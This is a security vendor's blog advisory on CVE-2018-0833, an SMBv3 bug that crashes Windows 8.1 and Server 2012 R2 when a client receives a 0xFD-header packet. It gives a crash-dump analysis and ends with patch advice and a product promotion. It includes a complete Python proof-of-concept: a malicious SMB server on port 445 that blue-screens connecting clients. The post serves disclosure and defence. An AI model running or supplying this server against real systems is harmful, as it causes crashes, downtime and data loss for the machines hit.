Windows SMB Blue Screen Of Death (BSOD)

  • Post author:
  • Reading time:4 mins read


Blue screen of death

After last year’s Service Message Block (SMB) ultra-shock, this year, a new denial-of-service vulnerability is present in SMBv3, which is in exploitation to crash Windows 8.1 and Windows Server 2012 R2 machines with a single packet. This vulnerability has been assigned CVE-2018-0833. These vulnerabilities can be resolved by using a good vulnerability management tool.


Technical Jargon:

The Windows SMB v3 session negotiation always starts with an SMBv2 session. SMB2 Transform_header is in use by the client or server to encrypt messages. The SMB2 Transform_header is only valid for SMBv3.

errors resulting in bsod

As  the above images are showing, from the 9th frame, encryption is set, and the byte sequence in the header is 0XFD. What happens if an SMB packet with a 0XFD header is sent even before negotiating the session?

All hell breaks loose, and the system crashes with no option but to restart it to restore functionality.

BSOD message

Finally, Let’s dig in a little deeper and seek out the root cause of it.

loading unloaded module list As we analyze the crash dump using winDbg, it says, “Probably caused by mrxsmb. sys ( mrxsmb ! SmbWskReceiveEvent +8539)“. The mrxsmb. sys module is where the crash occurred, a Microsoft Server Message Block (SMB) redirector. The exact place of the crash is mrxsmb!SmbWksReceiveEvent+8539, where a move occurs from [ecx+30h] to register EAX, the value of ECX is pointing to 0x00000000.

trap frame

The crash occurs because the ECX is pointing to 0x00000000 and tries to read the value from 0x00000030, which is protected memory space. This leads to kernel panic and forces restart.


Exploitation Technique:

To exploit this vulnerability, an attacker can host a malicious Windows SMB server and can then deceive the target into sending SMB session requests to the malicious server, which replies by sending back a crafted response and causes the system to crash.


Proof-of-Concept:

import SocketServer
from binascii import unhexlify
payload = '000000ecfd534d42414141414141414141414141414141414141414141414141414
141414141414141414141414141414141414141414141414141414141414141414141414141414
141414141414141414141414141414141414141414141414141414141414141414141414141414
141414141414141414141414141414141414141414141414141414141414141414141414141414
141414141414141414141414141414141414141414141414141414141414141414141414141414
141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141'
class byebye(SocketServer.BaseRequestHandler):
        def handle(self):
                try:
                        print "From:", self.client_address
                        print "[*]Sending Payload..."
                        self.request.send(unhexlify(payload))
                except Exception:
                        print "BSoD Triggered on", self.client_address
                        pass
SocketServer.TCPServer.allow_reuse_address = 1  
launch = SocketServer.TCPServer(('', 445),byebye)  
launch.serve_forever()

Impact:

The system goes crashing down and won’t gain back functionality until reboot. It may affect organizations as unprecedented crashes may lead to data loss, delays, system reboots, etc.


Solution:
To mitigate this critical vulnerability, Microsoft released a security patch. Click here to download the security patch for the respective affected operating systems.


SecPod Saner detects these vulnerabilities and automatically fixes it by applying security updates. Download Saner now and keep your systems updated and secure.